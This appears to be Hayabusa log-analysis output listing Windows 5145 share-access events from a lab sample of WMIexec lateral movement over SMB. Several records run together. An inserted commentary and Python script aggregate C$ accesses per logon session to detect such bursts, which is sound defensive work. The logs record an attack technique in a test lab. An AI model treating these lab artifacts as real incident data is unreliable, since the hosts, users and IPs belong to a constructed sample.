10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 
20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8#\02acbf854b27f2d83aa9eec6e1f6135a | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b#\69e2093b3cec29bdd3c9fbba83990dfe | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0#\dd2dddd8e337402ac96330a8d24120d6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp\3df09428e1087ca282100efc481a9947 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83#\93e744bcb19dc3206bfff080448a94e1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.654 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235#\8b051a98022e8b354053e87e1dcaf2f0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420#\88eec28a11e76fffbecf3de79cadf076 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2#\d75626a8ff89596aee2cf2c9eb554cbf | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90#\62095b976d2affb993898b2e9f88c475 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a#\f39c57237f98d69b4abdc9e3907d8fe7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479#\9fd6e8c8110ccd01fd6745507b906c04 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
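The 5145 hits above all carry the same Computer (fs03vuln.offsec.lan), User (admmig), source IP (10.23.23.9) and Logon ID (0x18acdd), and walk the C$ administrative share one directory at a time within a few hundred milliseconds; the sample they were parsed from is labelled "WMIexec execution via SMB". The per-event rule 5145_NetworkShareFileAccess.yml is information-level by design, so the signal is in the aggregation, not in any single row. The script below is an added example, not part of Hayabusa or of this output: it reads the CSV columns shown here (Timestamp, Computer, EventID, Details, ...), splits the Details field on " | ", groups admin-share 5145 accesses per (Computer, User, IP Addr, LID) session and reports any session touching at least min_paths distinct paths within window_s seconds. The sample input is constructed from a handful of the page's own records with shortened RulePath/FilePath values, plus one made-up benign row (user jdoe on a non-admin share) that must not be flagged; the thresholds are assumptions to tune against your own baseline.

```python
"""Aggregate Hayabusa 5145 'Network Share File Access' hits into per-session
admin-share bursts. Added example; not Hayabusa code."""
import csv
import io
from collections import defaultdict
from datetime import datetime

# Constructed sample: five of the page's records (RulePath/FilePath shortened)
# and one made-up benign row (jdoe reading a normal share) that must not alert.
SAMPLE_CSV = r"""Timestamp,Computer,EventID,Level,MitreAttack,RuleTitle,Details,RulePath,FilePath
2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig\44570ea6e616aa8a35b0768a4336f69d | IP Addr: 10.23.23.9 | LID: 0x18acdd,5145_NetworkShareFileAccess.yml,WMIexec.evtx
2021-04-22 20:32:31.450 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers | IP Addr: 10.23.23.9 | LID: 0x18acdd,5145_NetworkShareFileAccess.yml,WMIexec.evtx
2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\dfsvc | IP Addr: 10.23.23.9 | LID: 0x18acdd,5145_NetworkShareFileAccess.yml,WMIexec.evtx
2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown | IP Addr: 10.23.23.9 | LID: 0x18acdd,5145_NetworkShareFileAccess.yml,WMIexec.evtx
2021-04-22 20:32:31.497 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec# | IP Addr: 10.23.23.9 | LID: 0x18acdd,5145_NetworkShareFileAccess.yml,WMIexec.evtx
2021-04-22 20:40:02.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: jdoe | Share Name: \\*\Public | Share Path: \??\C:\Shares\Public | Path: report.xlsx | IP Addr: 10.23.23.50 | LID: 0x2b3c4d,5145_NetworkShareFileAccess.yml,constructed.evtx
"""


def parse_details(details):
    """Split Hayabusa's 'Key: Value | Key: Value' Details column into a dict.
    Values may contain ':' (e.g. '\\??\\C:\\'), so split only on the first ': '."""
    out = {}
    for part in details.split(" | "):
        key, sep, value = part.partition(": ")
        if sep:
            out[key.strip()] = value.strip()
    return out


def parse_ts(ts):
    """Hayabusa timestamps look like '2021-04-22 20:32:31.435 +09:00'."""
    return datetime.strptime(ts, "%Y-%m-%d %H:%M:%S.%f %z")


def admin_share_bursts(csv_text, min_paths=3, window_s=2.0):
    """Return sessions (Computer, User, IP Addr, LID) that accessed at least
    min_paths distinct paths on an administrative share within window_s seconds.
    Thresholds are assumptions for the example; tune them to your baseline."""
    per_session = defaultdict(list)
    share_of = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["EventID"] != "5145":
            continue
        d = parse_details(row["Details"])
        share = d.get("Share Name", "")
        # Keep C$/ADMIN$-style shares; IPC$ carries named-pipe traffic and is too noisy here.
        if not share.endswith("$") or share.upper().endswith("\\IPC$"):
            continue
        key = (row["Computer"], d.get("User"), d.get("IP Addr"), d.get("LID"))
        per_session[key].append((parse_ts(row["Timestamp"]), d.get("Path", "")))
        share_of[key] = share

    alerts = []
    for key, events in per_session.items():
        events.sort()
        best, lo = 0, 0
        # Sliding window: most distinct paths seen within any window_s span.
        for hi in range(len(events)):
            while (events[hi][0] - events[lo][0]).total_seconds() > window_s:
                lo += 1
            best = max(best, len({p for _, p in events[lo:hi + 1]}))
        if best >= min_paths:
            computer, user, ip, lid = key
            alerts.append({"computer": computer, "user": user, "ip": ip, "lid": lid,
                           "share": share_of[key], "distinct_paths": best,
                           "events": len(events)})
    return alerts


if __name__ == "__main__":
    for alert in admin_share_bursts(SAMPLE_CSV):
        print(alert)
```

Grouping on the Logon ID rather than only on user and IP keeps one authenticated SMB session together even when the same account is used from the same host for unrelated work. Expect legitimate remote administration (software distribution, backup and vulnerability-scanner agents) to trip this as well, so baseline by source IP before alerting; the sample's file name pairs these 5145 events with 4688 process creation, and requiring a 4688 from the same Logon ID on the target is the natural way to tighten the rule toward actual WMI execution.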
2021-04-22 20:32:31.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b#\ec2e3c1e16b1d1427b32d2f2babf99bc | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084#\a9175ff6a1a8784975c70e9933314ecd | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5#\c7ef2b5b5fc4335bef3148904cb3f0e5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a#\a5c640ad1645775e93d560f67f3ea1d1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e#\865873dc1b8af370b7a314c3c89dcfd0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168#\9d5a241e9cf3bdb8312058004ea269f4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\68828aa1ea98316a22a4d8488267b07b | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b#\7cb1fc2895121ae7e24841bd0c24b25e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656#\e1349161320cee221fb339c41ab73546 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
